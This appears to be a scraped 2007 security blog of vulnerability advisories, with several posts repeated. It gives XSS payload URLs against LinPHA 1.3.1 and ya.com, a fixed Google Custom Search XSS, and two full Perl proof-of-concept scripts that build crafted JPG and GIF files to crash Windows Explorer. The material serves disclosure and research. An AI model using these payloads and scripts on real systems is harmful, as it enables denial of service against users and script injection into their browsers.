##########################################
LINPHA 1.3.1 Multiple Scripts XSS
vendor url:http://linpha.sourceforge.net
Advisore:http://lostmon.blogspot.com/2007/09/
linpha-131-multiple-scripts-xss.html
vendor informed:NO exploit available:YES
##########################################
LinPHA is an easy to use, multilingual, flexible photo/image
archive/album/gallery written in PHP. It uses a SQL database
(MySQL/PostgreSQL/SQLite) to store information about your pictures
LinPHA contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate multiple params upon submission to multiple scripts
.This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server,
leading to a loss of integrity.
################
Versions
################
LinPHA 1.3.1
################
Timeline
################
Discovered:05-08-2007
disclosure:07-09-2007
###################
Examples
###################
http://localhost/linpha/actions/image_resized_view.php?
imgid=2945"><body><script>alert()</script><h1>lalala</h1></body>&wh=800x600
http://localhost/linpha/search.php?1=1&pn=2
"><script>alert()</script>#tn
http://localhost/linpha/viewer.php?album=etc/passwd">
<body><script>alert()</script><h1>lalala</h1></body>
http://localhost/linpha/search.php?1=1&order=">
<body><script>alert()</script><h1>lalala</h1></body>
http://localhost/linpha//search.php?1=1&imgid=14013">
<body><script>alert()</script><h1>lalala</h1></body>
http://localhost/linpha/search.php?1=1&imgid=14013">
<body><script>alert()</script><h1>lalala</h1></body>
http://localhost/linpha/search.php?search_text=a&order=">
<body><script>alert()</script><h1>lalala</h1></body>
Some other params and scripts are afected...
###################### €nd ###############################
Thnx to estrella to be my ligth
Thnx to all Lostmon´s Group Team
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Ya.com sufre agujeros de tipo XSS
Thursday, August 30, 2007
###################################
Ya.com sufre agujeros de tipo XSS
###################################
La web de Ya.com esta afectada por vulnerabilidades
de tipo cross-site scripting.
Los agjeros se hayan localizados bajo el subdonimio
acceso.ya.com y asi mismo sobre corp.ya.com
Aparte de los aqui mencionados a modo de prueba de
concepto existen algunos mas en algunas otras zonas
dinamicas del portal.
Tras haber intentado en varias ocasiones contactar
con ya.com , en principio ha sido imposible ya que
en su web la una forma de contacto con ellos es
telefonica, y yo no estoy dispuesto a gastarme
mi dinero para reportar fallos en su web;asi pues
me he visto obligado a mandar correos al tum tum
a seguridad, security etc etc @ya.com para ver si
por suerte alguno existia o no ,lo cual veo que no
al no obtener respuesta , o bien simplemente pasan...
Algunos ejemplos de esta explotacion:
https://acceso.ya.com/ayuda/searchfunc.html?si=html
&co=20&sw=[XSS-CODE]&Submit=Buscar
http://www.corp.ya.com/index.asp?op=58&cat=mod&id=2
&nombreoferta=[XSS-CODE]&nombrearea=Programa%20de%20Becas
http://www.corp.ya.com/index.asp?op=58&cat=mod&id=2
&nombreoferta=&nombrearea=Programa%20de%20Becas[XSS-CODE]
##################### €nd ###########################
Thnx to estrella to be my ligth.
Thnx to all Lostmon Team !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Ya.com sufre agujeros de tipo XSS
###################################
La web de Ya.com esta afectada por vulnerabilidades
de tipo cross-site scripting.
Los agjeros se hayan localizados bajo el subdonimio
acceso.ya.com y asi mismo sobre corp.ya.com
Aparte de los aqui mencionados a modo de prueba de
concepto existen algunos mas en algunas otras zonas
dinamicas del portal.
Tras haber intentado en varias ocasiones contactar
con ya.com , en principio ha sido imposible ya que
en su web la una forma de contacto con ellos es
telefonica, y yo no estoy dispuesto a gastarme
mi dinero para reportar fallos en su web;asi pues
me he visto obligado a mandar correos al tum tum
a seguridad, security etc etc @ya.com para ver si
por suerte alguno existia o no ,lo cual veo que no
al no obtener respuesta , o bien simplemente pasan...
Algunos ejemplos de esta explotacion:
https://acceso.ya.com/ayuda/searchfunc.html?si=html
&co=20&sw=[XSS-CODE]&Submit=Buscar
http://www.corp.ya.com/index.asp?op=58&cat=mod&id=2
&nombreoferta=[XSS-CODE]&nombrearea=Programa%20de%20Becas
http://www.corp.ya.com/index.asp?op=58&cat=mod&id=2
&nombreoferta=&nombrearea=Programa%20de%20Becas[XSS-CODE]
##################### €nd ###########################
Thnx to estrella to be my ligth.
Thnx to all Lostmon Team !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Windows Extended file attributes buffer overflow Study II
Thursday, August 09, 2007
##########################################################
Windows Extended file attributes buffer overflow Study II
Original:
##########################################################
In a previous article , i write about extended file
attributes:
"A local buffer overflow exists in the windows explorer .
The extended file atributes functions have a small size
of the buffer in 'FileAllInformation(),FileNameInformation'
and other subfunctions in Undocumented functions of NTDLL ,
resulting in a buffer overflow. With a unknow impact."
Original article:
http://lostmon.blogspot.com/2007/06/
buffer-overflow-in-extended-file.html
I Write "this issue could be done in all files"...
Now i go to extend some details moore of my investigation
and the research of this issue.
Look the new vulnerabilities on Microsoft windows GDI and ole32
http://www.securityfocus.com/bid/16167
http://www.securityfocus.com/bid/25207
http://secunia.com/advisories/10020/
http://secunia.com/advisories/10194/
http://osvdb.org/displayvuln.php?osvdb_id=31885
http://osvdb.org/displayvuln.php?osvdb_id=31886
http://osvdb.org/displayvuln.php?osvdb_id=31887
All PoC and all exploits have some details to study.
All files wen explorer crash ,crashing wen try to look
the extended file atributes of any file (*.jpg,*.doc,*.gif,*.wmf)
How to demostrate it ??
All exploits have some similitudes ....
all crafted files crashing at the same point or at the same properties
this is a litle test/study of those exploits / vulnerabilities
############################################
Testing with filemon and EFA.vbs
############################################
####################
Exploit wmf File
####################
Download BID 16167 exploit and unzip it in c:\test
open filemon and include process explorer.exe
and click in apply.
now open c:\test\ and wen explorer looks the EFA for the wmf
file , crash , or wen put the mouse over...
in the filemon wen the crash is done we have some similar to

Click To full size
filemon mark the overflow in 'FileAllInformation()' function.
another test with the same file :
save EFA_test.vbs and execute it , the windows scripting host
crash wen try to look extended attribute number 9 (Author).
delete the doc file in a dos command line :)
####################
Exploit jpg file
####################
Download BID 25207 exploit and unzip it in c:\test
open filemon and include process explorer.exe
and click in apply.
now open c:\test\ and wen explorer looks the EFA for the jpg
file , crash , or wen put the mouse over...
in the filemon wen the crash is done we have some similar to

Click To full size
filemon mark the overflow in 'FileAllInformation()' function.
another test with the same file :
save EFA_test.vbs and execute it , the windows scripting host
crash wen try to look extended attribute number 9 (Author).
delete the doc file in a dos command line :)
###################
exploit Gif file
###################
save exploit for Gif file in c:\test
open filemon and include process explorer.exe
and click in apply.
now open c:\test\ and wen explorer looks the EFA for the gif
file , crash , or wen put the mouse over...
in the filemon wen the crash is done we have some similar to

Click To full size
filemon mark the overflow in 'FileAllInformation()' function.
another test with the same file :
save EFA_test.vbs and execute it , the windows scripting host
crash wen try to look extended attribute number 9 (Author).
delete the doc file in a dos command line :)
###################
Exploit Doc file
###################
unzip the explorer_crasher.doc in c:\test\
open filemon and include process explorer.exe
and click in apply.
now open c:\test\ and wen explorer looks the EFA for the doc
file , crash , or wen put the mouse over...
in the filemon wen the crash is done filemon mark the
overflow in 'FileAllInformation()' function.
another test with the same file :
save EFA_test.vbs and execute it , the windows scripting host
crash wen try to look extended attribute number 9 (Author).
delete the doc file in a dos command line :)
#################################
LINKS AND FILES NEEDED
#################################
For testing this you need all exploits , filemon and EFA.vbs.
Download filemon :
http://www.microsoft.com/technet/
sysinternals/FileAndDisk/Filemon.mspx
Download Exploit Word file DoS :
http://www.milw0rm.com/sploits/03062007-Explorer_Crasher.tar
Download exploit BID 16167:
http://www.securityfocus.com/data/
vulnerabilities/exploits/WMF-DoS.rar
Exploit BID 25207 :
########################################################
#!/usr/bin/perl
#Bug found and ExpLoitEd by CrazyAngel
# Greets: st0rke, Elite, P0uya_s3rv3r, Aria
# ThnX ALL Shabgard.Org Members Specially Moderators and Clans
print "\nJPG PoC denial of service exploit by CrazyAngel ";
print "\n\ngenerating something.jpg...";
open(JPG, ">./something.jpg") or die "cannot create jpg file\n";
print JPG "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x72\x65\x7A\x61\x2E\x65";
print JPG "\x78\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print JPG "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print JPG "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print JPG "\x00\x00\x00\x00";
close(JPG);
print "ok\n\nnow try to browse folder in XP explorer and wait :)\n";
##########################################################
Save Gif file gdi32.dll DoS :
##########################################################
#!/usr/bin/perl
##########################################################
# Bug Found By ::DeltahackingTEAM
##
# Coded By Reza.Yavari (Dr.Pantagon)
##
#Web Site::Www.Deltahacking.net And Www.DeltaSecurity.ir And Www.PersianWhois.com
##
#Free Upload :: Www.Persianupload.com And Www.Persianupload.net
##
#Email: Dr.Pantagon [A]Deltasecurity.ir
##
# We Are::Dr.Trojan,Hiv++,D_7j,Dr.Pantagon,Impostor,Lord,Vpc,And....All Mem
print "\nGIF PoC denial of service exploit by Dr.Pantagon < Dr.Pantagon@deltasecurity.ir>";
print "\n\ngenerating Art.gif...";
print "\n\nUsage :";
print "\n\n1- Mouse Over Art.gif For Excute Exploit ";
print "\n\n2- Single Click Art.gif For Excute Exploit ";
print "\n\n3- Double Clik Art.gif (Open) For Excute Exploit ";
print "\n\n4- More... ";
print "\n\nYou Can open Art.gif Or Select Art.gif(Single Click) Or Delete Art.gif For Run(Excute) Exploit";
open(gif, ">./Art.gif") or die "cannot create gif file\n";
print gif "\x02\x00\x09\x00\x00\x03\x22\x00\x00\x00\x6\x7\x6\x6\x6\x64";
print gif "\x2D\x49\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print gif "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x9b\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99";
print gif "\x89\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x90\x90\x90\x90\x90\x90\x90\x90";
print gif "\x02\x00\x09\x00\x00\x03\x22\x00\x00\x00\x6\x7\x6\x6\x6\x64";
print gif "\x2D\x49\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print gif "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
close(gif);
print "ok\n\nok Gif Exploit Creat and run exploit and wait :)\n";
# milw0rm.com [2007-07-23]
########################################################
Save EFA_test.vbs:
#######################
EFA_test.vbs
########################
Dim arrHeaders(35)
Set objShell = CreateObject("Shell.Application")
Set objFolder = objShell.Namespace("C:\test")
For i = 0 to 34
arrHeaders(i) = objFolder.GetDetailsOf(objFolder.Items, i)
Next
For Each strFileName in objFolder.Items
For i = 0 to 34
Wscript.Echo i & vbtab & arrHeaders(i) _
& ": " & objFolder.GetDetailsOf(strFileName, i)
Next
Next
#########################################################
######################## €nd #########################
Thnx to estrella to be my ligth
Thnx To FalconDeOro Hi is investigate and documented with me this issue.
Thnx to Icaro and Badchecksum Team for interesting in research.
Thnx To Jkouns and Jericho for his patience.
Thnx to All osvdb Maglers they are involved in a very nice project.
Thnx to Secunia Research Team They make a Very Good Co-Work with the researchers
Thnx to All Lostmon´s Group Team
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Windows Extended file attributes buffer overflow Study II
Original:
##########################################################
In a previous article , i write about extended file
attributes:
"A local buffer overflow exists in the windows explorer .
The extended file atributes functions have a small size
of the buffer in 'FileAllInformation(),FileNameInformation'
and other subfunctions in Undocumented functions of NTDLL ,
resulting in a buffer overflow. With a unknow impact."
Original article:
http://lostmon.blogspot.com/2007/06/
buffer-overflow-in-extended-file.html
I Write "this issue could be done in all files"...
Now i go to extend some details moore of my investigation
and the research of this issue.
Look the new vulnerabilities on Microsoft windows GDI and ole32
http://www.securityfocus.com/bid/16167
http://www.securityfocus.com/bid/25207
http://secunia.com/advisories/10020/
http://secunia.com/advisories/10194/
http://osvdb.org/displayvuln.php?osvdb_id=31885
http://osvdb.org/displayvuln.php?osvdb_id=31886
http://osvdb.org/displayvuln.php?osvdb_id=31887
All PoC and all exploits have some details to study.
All files wen explorer crash ,crashing wen try to look
the extended file atributes of any file (*.jpg,*.doc,*.gif,*.wmf)
How to demostrate it ??
All exploits have some similitudes ....
all crafted files crashing at the same point or at the same properties
this is a litle test/study of those exploits / vulnerabilities
############################################
Testing with filemon and EFA.vbs
############################################
####################
Exploit wmf File
####################
Download BID 16167 exploit and unzip it in c:\test
open filemon and include process explorer.exe
and click in apply.
now open c:\test\ and wen explorer looks the EFA for the wmf
file , crash , or wen put the mouse over...
in the filemon wen the crash is done we have some similar to
Click To full size
filemon mark the overflow in 'FileAllInformation()' function.
another test with the same file :
save EFA_test.vbs and execute it , the windows scripting host
crash wen try to look extended attribute number 9 (Author).
delete the doc file in a dos command line :)
####################
Exploit jpg file
####################
Download BID 25207 exploit and unzip it in c:\test
open filemon and include process explorer.exe
and click in apply.
now open c:\test\ and wen explorer looks the EFA for the jpg
file , crash , or wen put the mouse over...
in the filemon wen the crash is done we have some similar to
Click To full size
filemon mark the overflow in 'FileAllInformation()' function.
another test with the same file :
save EFA_test.vbs and execute it , the windows scripting host
crash wen try to look extended attribute number 9 (Author).
delete the doc file in a dos command line :)
###################
exploit Gif file
###################
save exploit for Gif file in c:\test
open filemon and include process explorer.exe
and click in apply.
now open c:\test\ and wen explorer looks the EFA for the gif
file , crash , or wen put the mouse over...
in the filemon wen the crash is done we have some similar to
Click To full size
filemon mark the overflow in 'FileAllInformation()' function.
another test with the same file :
save EFA_test.vbs and execute it , the windows scripting host
crash wen try to look extended attribute number 9 (Author).
delete the doc file in a dos command line :)
###################
Exploit Doc file
###################
unzip the explorer_crasher.doc in c:\test\
open filemon and include process explorer.exe
and click in apply.
now open c:\test\ and wen explorer looks the EFA for the doc
file , crash , or wen put the mouse over...
in the filemon wen the crash is done filemon mark the
overflow in 'FileAllInformation()' function.
another test with the same file :
save EFA_test.vbs and execute it , the windows scripting host
crash wen try to look extended attribute number 9 (Author).
delete the doc file in a dos command line :)
#################################
LINKS AND FILES NEEDED
#################################
For testing this you need all exploits , filemon and EFA.vbs.
Download filemon :
http://www.microsoft.com/technet/
sysinternals/FileAndDisk/Filemon.mspx
Download Exploit Word file DoS :
http://www.milw0rm.com/sploits/03062007-Explorer_Crasher.tar
Download exploit BID 16167:
http://www.securityfocus.com/data/
vulnerabilities/exploits/WMF-DoS.rar
Exploit BID 25207 :
########################################################
#!/usr/bin/perl
#Bug found and ExpLoitEd by CrazyAngel
# Greets: st0rke, Elite, P0uya_s3rv3r, Aria
# ThnX ALL Shabgard.Org Members Specially Moderators and Clans
print "\nJPG PoC denial of service exploit by CrazyAngel ";
print "\n\ngenerating something.jpg...";
open(JPG, ">./something.jpg") or die "cannot create jpg file\n";
print JPG "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x72\x65\x7A\x61\x2E\x65";
print JPG "\x78\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print JPG "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print JPG "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print JPG "\x00\x00\x00\x00";
close(JPG);
print "ok\n\nnow try to browse folder in XP explorer and wait :)\n";
##########################################################
Save Gif file gdi32.dll DoS :
##########################################################
#!/usr/bin/perl
##########################################################
# Bug Found By ::DeltahackingTEAM
##
# Coded By Reza.Yavari (Dr.Pantagon)
##
#Web Site::Www.Deltahacking.net And Www.DeltaSecurity.ir And Www.PersianWhois.com
##
#Free Upload :: Www.Persianupload.com And Www.Persianupload.net
##
#Email: Dr.Pantagon [A]Deltasecurity.ir
##
# We Are::Dr.Trojan,Hiv++,D_7j,Dr.Pantagon,Impostor,Lord,Vpc,And....All Mem
print "\nGIF PoC denial of service exploit by Dr.Pantagon < Dr.Pantagon@deltasecurity.ir>";
print "\n\ngenerating Art.gif...";
print "\n\nUsage :";
print "\n\n1- Mouse Over Art.gif For Excute Exploit ";
print "\n\n2- Single Click Art.gif For Excute Exploit ";
print "\n\n3- Double Clik Art.gif (Open) For Excute Exploit ";
print "\n\n4- More... ";
print "\n\nYou Can open Art.gif Or Select Art.gif(Single Click) Or Delete Art.gif For Run(Excute) Exploit";
open(gif, ">./Art.gif") or die "cannot create gif file\n";
print gif "\x02\x00\x09\x00\x00\x03\x22\x00\x00\x00\x6\x7\x6\x6\x6\x64";
print gif "\x2D\x49\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print gif "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x9b\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99";
print gif "\x89\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x90\x90\x90\x90\x90\x90\x90\x90";
print gif "\x02\x00\x09\x00\x00\x03\x22\x00\x00\x00\x6\x7\x6\x6\x6\x64";
print gif "\x2D\x49\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print gif "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
close(gif);
print "ok\n\nok Gif Exploit Creat and run exploit and wait :)\n";
# milw0rm.com [2007-07-23]
########################################################
Save EFA_test.vbs:
#######################
EFA_test.vbs
########################
Dim arrHeaders(35)
Set objShell = CreateObject("Shell.Application")
Set objFolder = objShell.Namespace("C:\test")
For i = 0 to 34
arrHeaders(i) = objFolder.GetDetailsOf(objFolder.Items, i)
Next
For Each strFileName in objFolder.Items
For i = 0 to 34
Wscript.Echo i & vbtab & arrHeaders(i) _
& ": " & objFolder.GetDetailsOf(strFileName, i)
Next
Next
#########################################################
######################## €nd #########################
Thnx to estrella to be my ligth
Thnx To FalconDeOro Hi is investigate and documented with me this issue.
Thnx to Icaro and Badchecksum Team for interesting in research.
Thnx To Jkouns and Jericho for his patience.
Thnx to All osvdb Maglers they are involved in a very nice project.
Thnx to Secunia Research Team They make a Very Good Co-Work with the researchers
Thnx to All Lostmon´s Group Team
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Google custom search engine contributors invite XSS
Tuesday, August 07, 2007
#####################################################
Google custom search engine contributors invite XSS
Vendor url: http://www.google.com
Product Url: http://www.google.com/coop/cse/
Advisore url:http://lostmon.blogspot.com/2007/08/
google-custom-search-engine.html
Vendor notify :yes vendor confirmed: yes Fixed: YES
#####################################################
Description:
A Custom Search Engine is a tailored search experience,
built using Google's core search technology, which
prioritizes or restricts search results based on websites
and pages that you specify, and which can be tailored to
reflect your point of view or area of expertise.
Google Custom search Engine have a flaw that allows a remote
cross site scripting attack.This flaw exists because the
application does not validate The texarea in the wen preview
a invite.This could allow a user to create a specially
invite that would execute arbitrary code in a user's browser
within the trust relationship between the browser and the server,
leading to a loss of integrity.
################
timeline
###############
discovered: 31-07-2007
vendor notifY 31-07-2007
vendor response:31-07-2007
vendor fix:07-08-2007 (i test it today)
disclosure:07-08-2007
####################
explanation
###################

Go to
http://www.google.com/coop/manage/cse/collaboration?cx=[tokem-of search engine]
and in 'Add a personal note to the invitation' write some javascript
or html code and them click on 'invite preview'
this code is execute...
Also the form convert to hexa with semicoloms to html :
it works transform to html code , but it does not execute it :)
we can try to convert it in decimal values and it show too the
html without execute it.
Only works with 'simple' html
######################### €nd ########################
Thnx To estrella To be my ligth
Thnx to all Lostmon Team !!
-
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Google custom search engine contributors invite XSS
Vendor url: http://www.google.com
Product Url: http://www.google.com/coop/cse/
Advisore url:http://lostmon.blogspot.com/2007/08/
google-custom-search-engine.html
Vendor notify :yes vendor confirmed: yes Fixed: YES
#####################################################
Description:
A Custom Search Engine is a tailored search experience,
built using Google's core search technology, which
prioritizes or restricts search results based on websites
and pages that you specify, and which can be tailored to
reflect your point of view or area of expertise.
Google Custom search Engine have a flaw that allows a remote
cross site scripting attack.This flaw exists because the
application does not validate The texarea in the wen preview
a invite.This could allow a user to create a specially
invite that would execute arbitrary code in a user's browser
within the trust relationship between the browser and the server,
leading to a loss of integrity.
################
timeline
###############
discovered: 31-07-2007
vendor notifY 31-07-2007
vendor response:31-07-2007
vendor fix:07-08-2007 (i test it today)
disclosure:07-08-2007
####################
explanation
###################
Go to
http://www.google.com/coop/manage/cse/collaboration?cx=[tokem-of search engine]
and in 'Add a personal note to the invitation' write some javascript
or html code and them click on 'invite preview'
this code is execute...
Also the form convert to hexa with semicoloms to html :
it works transform to html code , but it does not execute it :)
we can try to convert it in decimal values and it show too the
html without execute it.
Only works with 'simple' html
######################### €nd ########################
Thnx To estrella To be my ligth
Thnx to all Lostmon Team !!
-
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Subscribe to:
Posts (Atom)